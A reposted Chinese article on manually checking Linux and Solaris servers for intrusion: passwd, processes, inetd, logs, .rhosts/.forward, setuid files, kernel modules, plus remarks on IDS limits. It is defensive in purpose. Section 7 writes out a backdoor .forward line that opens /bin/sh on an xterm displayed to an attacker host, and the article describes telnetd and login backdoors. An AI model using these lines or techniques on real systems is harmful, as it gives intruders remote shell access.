解析Linux如何判断自己的服务器是否被入侵的检测方法

马哥Linux运维 2018-01-13 10:27 次阅读

如何判断自己的服务器是否被入侵了呢?仅仅靠两只手是不够的,但两只手也能起到一些作用,我们先来看看UNIX系统上一些入侵检测方法,以LINUX和solaris为例。

1、检查系统密码文件

首先从明显的入手,查看一下passwd文件,ls –l /etc/passwd查看文件修改的日期。

检查一下passwd文件中有哪些特权用户,系统中uid为0的用户都会被显示出来。

解析Linux如何判断自己的服务器是否被入侵的检测方法

顺便再检查一下系统里有没有空口令帐户:

2、查看一下进程,看看有没有奇怪的进程

重点查看进程:

ps –aef | grep inetd

inetd是UNIX系统的守护进程,正常的inetd的pid都比较靠前,如果你看到输出了一个类似inetd –s /tmp/.xxx之类的进程,着重看inetd –s后面的内容。在正常情况下,LINUX系统中的inetd服务后面是没有-s参数的,当然也没有用inetd去启动某个文件;而solaris系统中也仅仅是inetd –s,同样没有用inetd去启动某个特定的文件;如果你使用ps命令看到inetd启动了某个文件,而你自己又没有用inetd启动这个文件,那就说明已经有人入侵了你的系统,并且以root权限起了一个简单的后门。

输入ps –aef 查看输出信息,尤其注意有没有以./xxx开头的进程。一旦发现异样的进程,经检查为入侵者留下的后门程序,立即运行kill –9 pid 开杀死该进程,然后再运行ps –aef查看该进程是否被杀死;一旦此类进程出现杀死以后又重新启动的现象,则证明系统被人放置了自动启动程序的脚本。这个时候要进行仔细查找:find / -name 程序名 –print,假设系统真的被入侵者放置了后门,根据找到的程序所在的目录,会找到很多有趣的东东J

UNIX下隐藏进程有的时候通过替换ps文件来做,检测这种方法涉及到检查文件完整性,稍后我们再讨论这种方法。接下来根据找到入侵者在服务器上的文件目录,一步一步进行追踪。

3、检查系统守护进程

检查/etc/inetd.conf文件,输入:cat /etc/inetd.conf | grep –v “^#”,输出的信息就是你这台机器所开启的远程服务。

一般入侵者可以通过直接替换in.xxx程序来创建一个后门,比如用/bin/sh 替换掉in.telnetd,然后重新启动inetd服务,那么telnet到服务器上的所有用户将不用输入用户名和密码而直接获得一个rootshell。

4、检查网络连接和监听端口

输入netstat -an,列出本机所有的连接和监听的端口,查看有没有非法连接。

输入netstat –rn,查看本机的路由、网关设置是否正确。

输入 ifconfig –a,查看网卡设置。

5、检查系统日志

命令last | more查看在正常情况下登录到本机的所有用户的历史记录。但last命令依赖于syslog进程,这已经成为入侵者攻击的重要目标。入侵者通常会停止系统的syslog,查看系统syslog进程的情况,判断syslog上次启动的时间是否正常,因为syslog是以root身份执行的,如果发现syslog被非法动过,那说明有重大的入侵事件。

在linux下输入ls –al /var/log

在solaris下输入 ls –al /var/adm

检查wtmp utmp,包括messgae等文件的完整性和修改时间是否正常,这也是手工擦除入侵痕迹的一种方法。

6、检查系统中的core文件

通过发送畸形请求来攻击服务器的某一服务来入侵系统是一种常规的入侵方法,典型的RPC攻击就是通过这种方式。这种方式有一定的成功率,也就是说它并不能100%保证成功入侵系统,而且通常会在服务器相应目录下产生core文件,全局查找系统中的core文件,输入find / -name core –exec ls –l {} \; 依据core所在的目录、查询core文件来判断是否有入侵行为。

7、.rhosts和.forward

这是两种比较著名的后门文件,如果想检查你的系统是否被入侵者安装了后门,不妨全局查找这两个文件:

find / -name “.rhosts” –print 

find / -name “.forward” –print 

在某用户的$HOME下,.rhosts文件中仅包含两个+号是非常危险的,如果你的系统上开了513端口(rlogin端口,和telnet作用相同),那么任意是谁都可以用这个用户登录到你的系统上而不需要任何验证。

Unix下在.forward文件里放入命令是重新获得访问的常用方法在某一 用户$HOME下的.forward可能设置如下:

\username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh" 

这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或procmail类程序, 很有可能还有问题。在Solaris系统下,如果你运行如下命令:

ln -s /var/mail/luser ~/.forward 

然后设置vacation有效,那么/var/mail/luser就会被拷贝到~/.forward,同时会附加"|/usr/bin/vacation me",旧的symlink被移到~/.forward..BACKUP中。直接删除掉这两个文件也可以。

8、检查系统文件完整性

检查文件的完整性有多种方法,通常我们通过输入ls –l 文件名来查询和比较文件,这种方法虽然简单,但还是有一定的实用性。但是如果ls文件都已经被替换了就比较麻烦。在LINUX下可以用rpm –V `rpm –qf 文件名` 来查询,国家查询的结果是否正常来判断文件是否完整。在LINUX下使用rpm来检查文件的完整性的方法也很多,这里不一一赘述,可以man rpm来获得更多的格式。

UNIX系统中,/bin/login是被入侵者经常替换作为后门的文件,接下来谈一下login后门 :

UNIX里,Login程序通常用来对telnet来的用户进行口令验证。入侵者获取login的源代码并修改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入:这将允许入侵者进入任何账号,甚至是root目录。由于后门口令是在用户真实登录并被日志记录到utmp和wtmP前产生的一个访问,所以入侵者可以登录获取shell却不会暴露该账号。管理员注意到这种后门后,使用”strings”命令搜索login程序以寻找文本信息。许多情况下后门口令会原形毕露。入侵者又会开始加密或者更改隐藏口令,使strings命令失效。所以许多管理员利用MD5校验和检测这种后门。UNIX系统中有md5sum命令,输入md5sum 文件名检查该文件的md5签名。它的使用格式如下:md5sum –b 使用二进制方式阅读文件;md5sum –c 逆向检查MD5签名;md5sum –t 使用文本方式阅读文件。

在前面提到过守护进程,对于守护进程配置文件inetd.conf中没有被注释掉的行要进行仔细比较,举个简单的例子,如果你开放了telnet服务,守护进程配置文件中就会有一句:telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

可以看到它所使用的文件是 /usr/sbin/in.telnetd,检查该文件的完整性,入侵者往往通过替换守护进程中允许的服务文件来为自己创建一个后门。

LINUX系统中的/etc/crontab也是经常被入侵者利用的一个文件,检查该文件的完整性,可以直接cat /etc/crontab,仔细阅读该文件有没有被入侵者利用来做其他的事情。

不替换login等文件而直接使用进程来启动后门的方法有一个缺陷,即系统一旦重新启动,这个进程就被杀死了,所以得让这个后门在系统启动的时候也启动起来。通常通过检查/etc/rc.d下的文件来查看系统启动的时候是不是带有后门程序;这个方法怎么有点象查windows下的trojan?

说到这里,另外提一下,如果在某一目录下发现有属性为这样的文件:-rwsr-xr-x 1 root root xxx .sh,这个表明任何用户进来以后运行这个文件都可以获得一个rootshell,这就是setuid文件。运行 find –perm 4000 –print对此类文件进行全局查找,然后删除这样的文件。

9、检查内核级后门

如果你的系统被人安装了这种后门,通常都是比较讨厌的,我常常就在想,遇到这种情况还是重新安装系统算了J,言归正传,首先,检查系统加载的模块,在LINUX系统下使用lsmod命令,在solaris系统下使用modinfo命令来查看。这里需要说明的是,一般默认安装的LINUX加载的模块都比较少,通常就是网卡的驱动;而solaris下就很多,没别的办法,只有一条一条地去分析。对内核进行加固后,应禁止插入或删除模块,从而保护系统的安全,否则入侵者将有可能再次对系统调用进行替换。我们可以通过替换create_module()和delete_module()来达到上述目的。

另外,对这个内核进行加固模块时应尽早进行,以防系统调用已经被入侵者替换。如果系统被加载了后门模块,但是在模块列表/proc/module里又看不到它们,有可能是使用了hack工具来移除加载的模块,大名鼎鼎的knark工具包就有移除加载模块的工具。出现这种情况,需要仔细查找/proc目录,根据查找到的文件和经验来判断被隐藏和伪装的进程。Knark后门模块就在/proc/knark目录,当然可能这个目录是隐藏的。

10、手工入侵检测的缺陷

上面谈了一些手工入侵检测的方法,但这些方式有一定的缺陷,有的甚至是不可避免的缺陷,这就是为什么说手工检测是“体力活”的原因。我们先来看看这些缺陷:

1)手工入侵检测只能基于主机,也就是说所有的入侵检测工作只能在操作系统下面完成,这是它固有的缺陷;基本上所有凌驾于操作系统之外的入侵行为统统无法探测得到。网络级的入侵,交换机、路由器上面的入侵和攻击行为,作为服务器的操作系统都无法得知;信息已经从主机发送出去了,如果在传送的介质当中被拦截,主机的操作系统是永远无动于衷的。

2)手工的入侵检测要求精通操作系统,并且漏洞库资料的刷新要快;在做一个网管的同时要做一个黑客。可以说经验的积累永远跟不上全世界漏洞资料的更新,难保系统不被新的漏洞所侵入。

3)手工入侵检测只是“就事论事”,根据发生的某一情况判断入侵事件,再作出相应的对应和防范措施,而无法预先根据入侵者的探测行为作出对攻击事件的描述,定义事件级别,在不防碍系统正常工作的情况下阻止下一步对系统的入侵行为。

4)可以通过手工入侵检测发现主机上的某些漏洞,进而作出相应的安全措施。但却避免不了一种现象:无法避免两个入侵者利用同一个漏洞攻击主机,即无法判断攻击模式来切断入侵行为。

5)综上所述,手工的入侵检测行为对于系统安全来说只是治标而不治本,多半还是依靠管理员的技巧和经验来增强系统的安全性,没有,也不可能形成真正的安全体系,虽然聊胜于无,可以检测和追踪到某些入侵行为,但如果碰上同样精通系统的入侵者就很难抓住踪迹了。

11、入侵检测系统的比较

搭建真正的安全体系需要入侵检测系统—IDS,一个优秀的入侵检测系统辅以系统管理员的技巧和经验可以形成真正的安全体系,有效判断和切断入侵行为,真正保护主机、资料。人们有时候会以为ISS的realsecure是优秀的入侵检测系统,其实不然,realsecure带有一定的缺陷,不谈它对事件的误报、漏报和错报,首先它是一个英文的软件,使用和熟悉起来有一定的难度。而且由于是外国人的软件,很多hack对realsecure有深入的研究,已经发掘出它的一些漏洞,甚至是固有漏洞,我就曾经测试出有的攻击手段可以令realsecure瘫痪。

再者,realsecure也是架设在服务器操作系统之上的,操作系统停止工作,同样令之停止工作,换句话说,很简单,攻击者攻击的目标往往就是realsecure本身。设想,假设你的系统依赖于入侵检测系统,而入侵检测系统被攻击者搞掉,那你的系统将大门敞开,任由出入,后果不堪设想。

热门推荐

原文标题:Linux如何判断自己的服务器是否被入侵

文章出处:【微信号:magedu-Linux,微信公众号:马哥Linux运维】欢迎添加关注!文章转载请注明出处。

收藏 人收藏
分享:

评论

相关推荐

共享内存IPC原理,Linux进程间如何共享内存?

共享内存是在内存中单独开辟的一段内存空间,这段内存空间有自己特有的数据结构,包括访问权限、大小和最近....

的头像 马哥Linux运维 发表于 07-16 13:43 33次 阅读
共享内存IPC原理,Linux进程间如何共享内存?

Linux系统中的实时调度器DL调度器的原理是什么?详细概述

实时系统是这样的一种计算系统:当事件发生后,它必须在确定的时间范围内做出响应。在实时系统中,产生正确....

的头像 Wildesbeast 发表于 07-16 11:00 43次 阅读
Linux系统中的实时调度器DL调度器的原理是什么?详细概述

Raspberry Pi 开发板优化设计

发表于 07-16 09:54 77次 阅读
Raspberry Pi 开发板优化设计

联想声明一直支持国产操作系统发展

据消息报道,针对网传的国产操作系统投票事件,联想集团昨日晚间发布声明称:“联想集团过去、现在、将来都....

的头像 EETOP 发表于 07-16 09:39 79次 阅读
联想声明一直支持国产操作系统发展

雪人计划是什么?可一键关停互联网?雪人计划真相看这里

雪人计划是什么?雪人计划真相是什么?难道真的美国能随时一键关停中国互联网?在前段时间美国制裁中兴的时....

发表于 07-14 10:24 675次 阅读
雪人计划是什么?可一键关停互联网?雪人计划真相看这里

无服务器与事件驱动计算的兴起,基础设施本身正在被抽象化

Sarah Guo是Greylock Partners的合伙人,她在早期阶段对公司进行了投资,她认为....

的头像 物联网技术 发表于 07-13 16:51 267次 阅读
无服务器与事件驱动计算的兴起,基础设施本身正在被抽象化

物联网并不像你想象的那么安全

2018 年 6 月 27 日,中国移动、中国电信、中国联通、AT&T、沃达丰、德国电信、阿联酋电信....

的头像 重庆物联网 发表于 07-13 16:37 377次 阅读
物联网并不像你想象的那么安全

MATLAB R2018a Linux官方试用软件免费下载

  matlab r2018a是一款经典好用的商业数学软件,新版包含更多数据分析、机器学习和深度学习....

发表于 07-12 17:12 15次 阅读
MATLAB R2018a Linux官方试用软件免费下载

MATLAB R2018a Linux最新完整版软件免费下载

 matlab r2018a是一款经典好用的商业数学软件,新版包含更多数据分析、机器学习和深度学习选....

发表于 07-12 17:08 19次 阅读
MATLAB R2018a Linux最新完整版软件免费下载

嵌入式Linux系统从软件的角度看通常可以分为几个层次?

每种不同的 CPU 体系结构都有不同的 Boot Loader。有些 Boot Loader 也支持....

的头像 嵌入式ARM 发表于 07-12 11:20 181次 阅读
嵌入式Linux系统从软件的角度看通常可以分为几个层次?

优质视频教程,免费观看,快乐学习

发表于 07-12 09:13 105次 阅读
优质视频教程,免费观看,快乐学习

Linux虚拟机上安装Xilinx petalinux2015.4版本详细步骤

首先是“管理”-》“全局设定”-》“常规”-》默认虚拟电脑位置:选择一个专门用来放置虚拟机的位置,并....

发表于 07-12 08:45 61次 阅读
Linux虚拟机上安装Xilinx petalinux2015.4版本详细步骤

东进统一安全认证平台 安全服务需持续更新

随着物联网、金融科技的快速发展,数据安全、服务授权和身份认证等过程面临更大的挑战。

的头像 CTI论坛 发表于 07-11 16:09 212次 阅读
东进统一安全认证平台 安全服务需持续更新

LINUX是什么?LINUX运行所需的硬件/软件

LINUX会发展成为一个自给自足的系统,现在需要Minix-386才能正常运行。你需要Minix让初....

的头像 Linux爱好者 发表于 07-11 15:32 157次 阅读
LINUX是什么?LINUX运行所需的硬件/软件

虚拟机和容器,你应该怎么选?

首先要了解的有关容器和虚拟机的一个事情是,一个运用于应用程序,另一个是为操作系统设计的。这就是为什么....

的头像 马哥Linux运维 发表于 07-11 10:17 202次 阅读
虚拟机和容器,你应该怎么选?

关于英飞凌碳化硅器件的服务器介绍

采用具备更佳导电性能的碳化硅器件的服务器的耗电量大幅度降低

的头像 Infineon视频 发表于 07-11 02:18 201次 观看
关于英飞凌碳化硅器件的服务器介绍

Intel发飙,下一代Xeon至强服务器平台内存总容量将达3.84TB!

Intel将在今年晚些时候推出下一代Xeon至强服务器平台,代号“Cascade Lake”,仍然是....

发表于 07-10 16:10 48次 阅读
Intel发飙,下一代Xeon至强服务器平台内存总容量将达3.84TB!

中国1400万服务器暴露原因,180万数据库端口暴露

报告指出,中国暴露严重的主要原因在于缺乏加密服务,这使被动的监控和针对不安全明文协议的主动攻击成为可....

的头像 E安全 发表于 07-10 16:03 115次 阅读
中国1400万服务器暴露原因,180万数据库端口暴露

关于Linux的特点析以及在嵌入式操作系统中的应用详解

本文分析了Linux的特点,稳健性和局限性以及最重要的实时领域的应用。过去,因为非PC的嵌入式硬件....

发表于 07-10 15:05 56次 阅读
关于Linux的特点析以及在嵌入式操作系统中的应用详解

Linux Kernel 4.16系列停止维护,建议用户升级至 4.17

知名 Linux 内核维护人员兼开发人员 Greg Kroah-Hartman 近日在发布 4.16....

的头像 Linux爱好者 发表于 07-10 14:39 167次 阅读
Linux Kernel 4.16系列停止维护,建议用户升级至 4.17

如何在Linux中驱动Generic Timer

在单核时代,各个SOC vendor厂商购买ARM core的IP,然后自己设计SOC上的perip....

的头像 Linuxer 发表于 07-10 11:42 266次 阅读
如何在Linux中驱动Generic Timer

高通重磅级大佬离职 服务器芯片未来堪忧

高通QDT部门表示QDT的技术副总裁Dileep Bhandarkar也已经离职,Dileep是高通....

的头像 EETOP 发表于 07-10 11:34 420次 阅读
高通重磅级大佬离职 服务器芯片未来堪忧

学习嵌入式有前途吗?

学习嵌入式有前途吗?很多计算机行业的人都有这个问题。在日益信息化的社会,计算机和网络已渗透到我们日常....

发表于 07-10 10:56 26次 阅读
学习嵌入式有前途吗?

嵌入式工程师的职业发展方向学习规划

嵌入式目前主要面向的几个操作系统是,LINUX,WINCE、VxWorks等等 Linux是开源免费....

发表于 07-10 10:56 28次 阅读
嵌入式工程师的职业发展方向学习规划

嵌入式的两大方向您了解吗?

嵌入式系统无疑是当前最热门最有发展前途的IT应用领域之一,它是各种电子产品的核心技术,也是工业4.0....

发表于 07-10 10:56 52次 阅读
嵌入式的两大方向您了解吗?

嵌入式系统发展前景好么?

嵌入式系统工程师机器语言程序员程序员嵌入式系统开发编程数据结构、内核操作系统

发表于 07-10 10:56 37次 阅读
嵌入式系统发展前景好么?

为什么要学嵌入式?学好嵌入式真的有发展前途吗?

1. IT行业在多年前就已经超越金融行业,成为平均薪资最高的行业,大家都纷纷开始想在IT行业谋得一席....

发表于 07-10 10:56 23次 阅读
为什么要学嵌入式?学好嵌入式真的有发展前途吗?

嵌入式linux学习步骤

1、Linux 基础安装Linux操作系统 Linux文件系统 Linux常用命令 Linux启动过....

发表于 07-10 10:56 31次 阅读
嵌入式linux学习步骤

新手学习嵌入式的十大“不要”

随着嵌入式逐渐走入我们的生活,越来越多的人加入了学习嵌入式的大军。但是,在学习嵌入式之前难免会有新手....

发表于 07-10 10:56 24次 阅读
新手学习嵌入式的十大“不要”

嵌入式开发与单片机开发有什么区别

1嵌入式开发就是设计特定功能的计算机系统,手机,mp3、mp4.mp5自动供水系统,洗衣机,油井监控....

发表于 07-10 10:56 34次 阅读
嵌入式开发与单片机开发有什么区别

爱特梅尔Linux Android生态系统工具

Atmel's Linux Android生态系统工具支持

的头像 Microchip视频 发表于 07-10 00:21 264次 观看
爱特梅尔Linux Android生态系统工具

嵌入式时代已经来临,嵌入式学习的方法你知道多少呢?

现在很多同学也意识到了学校培养模式和社会需求脱节问题,有一部分同学也先行行动起来,开始注重培养自己....

发表于 07-09 14:25 258次 阅读
嵌入式时代已经来临,嵌入式学习的方法你知道多少呢?

MY-8188EUS Linux-3.14.52 Test manual

发表于 07-09 14:03 152次 阅读
MY-8188EUS Linux-3.14.52 Test manual

Linux系统开机和启动过程

提起操作系统这个词,想必大家并不陌生,有电脑端操作系统和手机端操作系统。电脑端操作系统较为熟悉的就是....

发表于 07-09 11:53 127次 阅读
Linux系统开机和启动过程

嵌入式Linux工程师的学习发展步骤,如何测试工程师之间的区别

从嵌入式研发行业十年,认为学习就是要不断的吸纳知识,在研发过程中,经常会遇到一些问题,这种发现问题并....

的头像 传感器技术 发表于 07-09 11:37 166次 阅读
嵌入式Linux工程师的学习发展步骤,如何测试工程师之间的区别

怎么样在Linux和Windows之间共享文件?应该使用什么样的工具

用一些来自 Linux 社区的工具,在 Linux 和 Windows 之间共享文件是超容易的。让我....

的头像 Linux爱好者 发表于 07-09 10:57 253次 阅读
怎么样在Linux和Windows之间共享文件?应该使用什么样的工具

为什么要学习运维?来看美国运维的大数据报告了解运维行业的发展前景

这是第一份运维薪水调查报告,发现了一些有趣方面。比如说,运维专业人员不光对现状普遍感到满意,对于工作....

的头像 阿铭linux 发表于 07-09 10:52 175次 阅读
为什么要学习运维?来看美国运维的大数据报告了解运维行业的发展前景

linux目录结构

发表于 07-09 09:33 56次 阅读
linux目录结构

LINUX Fredora 下yum的使用

发表于 07-09 08:29 78次 阅读
LINUX Fredora 下yum的使用

Linux命令格式解析

发表于 07-09 05:50 40次 阅读
Linux命令格式解析

与嵌入式新手分享Linux内核编码风格

发表于 07-09 04:13 62次 阅读
与嵌入式新手分享Linux内核编码风格

深入探究Linux的设备树

发表于 07-09 00:15 45次 阅读
深入探究Linux的设备树

时隔5年,美国将重夺最强超算宝座

橡树岭国家实验称,“顶点”将为能源、先进材料、人工智能等领域的研究提供前所未有的运算能力,并列举天体....

的头像 IEEE电气电子工程师学会 发表于 07-08 08:36 400次 阅读
时隔5年,美国将重夺最强超算宝座

《2017网络安全态势观察报告》发布 干货高能预警

今日,启明星辰集团发布《2017网络安全态势观察报告》,报告对中国2017年(部分安全事件发生于20....

的头像 电子发烧友网工程师 发表于 07-07 09:29 278次 阅读
《2017网络安全态势观察报告》发布 干货高能预警

Linux运维工作至少需要知道哪5点知识你知道吗?带你来了解

知乎上有这样一个问题:一个新手面试 Linux 运维工作至少需要知道哪些知识?其中有一个答案对这一话....

的头像 马哥Linux运维 发表于 07-06 14:57 375次 阅读
Linux运维工作至少需要知道哪5点知识你知道吗?带你来了解

97条Linux常用命令总结你了解多少啊看懂了你Linux就入门了

1.ls [选项] [目录名 | 列出相关目录下的所有目录和文件 -a 列出包括.a开头的隐藏文....

的头像 马哥Linux运维 发表于 07-06 14:53 334次 阅读
97条Linux常用命令总结你了解多少啊看懂了你Linux就入门了

grep常用用法,grep与正规表达式

但是第 18 行明明有 google 的 goo 啊~别忘记了,因为该行后面出现了 tool 的 t....

的头像 马哥Linux运维 发表于 07-06 11:14 223次 阅读
grep常用用法,grep与正规表达式

嵌入式Linux内核字符设备的详细资料概述

学内核不是为了吓唬人的,是为了掌握其原理,学习其技巧与方法,知其然而知其所以然,另外内核代码是具有一....

的头像 嵌入式ARM 发表于 07-06 09:57 268次 阅读
嵌入式Linux内核字符设备的详细资料概述

如何在Linux 中安装和使用 PacVim?

PacVim 的灵感来源于经典游戏 PacMan,它以一种好玩有趣的方式为你提供了大量的 Vim 命....

的头像 Linux爱好者 发表于 07-06 09:50 217次 阅读
如何在Linux 中安装和使用 PacVim?

原因分析:CPU拓扑差异导致Unixbench分数异常

本文通过实验论证:Unixbench的Pipe-based Context Switching用例受....

的头像 Linuxer 发表于 07-06 09:35 785次 阅读
原因分析:CPU拓扑差异导致Unixbench分数异常

怎么在8位AVR微控制器上运行Linux?

这是在8位的AVR微控制器上运行Linux的全过程,时间很长哦,大家可以跳着往后看。

的头像 Microchip视频 发表于 07-06 04:02 139次 观看
怎么在8位AVR微控制器上运行Linux?

来聊聊函数是怎么传入参数的

从图例中可以看出,当A函数没有调用B函数时,A函数的栈帧只保存着局部变量,而EBP(栈底指针)指向的....

的头像 嵌入式ARM 发表于 07-05 15:57 299次 阅读
来聊聊函数是怎么传入参数的

自动驾驶:法雷奥宣布加入百度Apollo自动驾驶平台

近日,IDC公布最新数据,2018年第一季度浪潮服务器出货量位居全球第三,同时,出货量和销售额蝉联中....

的头像 智能制造发展联盟 发表于 07-05 14:23 473次 阅读
自动驾驶:法雷奥宣布加入百度Apollo自动驾驶平台

EasyARM-iMX28xx Linux开发指南(共275页pdf电子书下载)

发表于 07-05 11:00 85次 阅读
EasyARM-iMX28xx Linux开发指南(共275页pdf电子书下载)

如何使用环境变量进行Linux提权的方法详细资料概述

在这篇文章中,我将会为大家介绍一些使用环境变量进行Linux提权的方法,包括在CTF challen....

的头像 马哥Linux运维 发表于 07-05 09:50 696次 阅读
如何使用环境变量进行Linux提权的方法详细资料概述

嵌入式Linux开发学习推荐书籍

发表于 07-05 02:30 88次 阅读
嵌入式Linux开发学习推荐书籍

关于黑客常用3种DNS欺骗手法详解,教你如何防御DNS陷阱

DNS如何被利用?那么这个系统如何让用户变得脆弱?通常解析器会告诉每个DNS服务器你正在寻找哪个域....

发表于 07-04 10:24 96次 阅读
关于黑客常用3种DNS欺骗手法详解,教你如何防御DNS陷阱

快速了解Linux文件系统

早在 1996 年,在真正理解文件系统的结构之前,我就学会了如何在我崭新的 Linux 上安装软件。....

的头像 Linux爱好者 发表于 07-04 10:16 225次 阅读
快速了解Linux文件系统

嵌入式的两大发展方向与嵌入式工程师的学习方向

嵌入式系统无疑是当前最热门最有发展前途的IT应用领域之一,它是各种电子产品的核心技术,也是工业4.0....

发表于 07-03 09:46 91次 阅读
嵌入式的两大发展方向与嵌入式工程师的学习方向

ARM与嵌入式linux入门必须要进行的6个关键步骤快点来了解吧!

由于很多人总问这个问题,所以这里做一个总结供大家参考。这里必须先说明,以下的步骤都是针对Linux系....

的头像 嵌入式单片机 发表于 07-01 09:23 442次 阅读
ARM与嵌入式linux入门必须要进行的6个关键步骤快点来了解吧!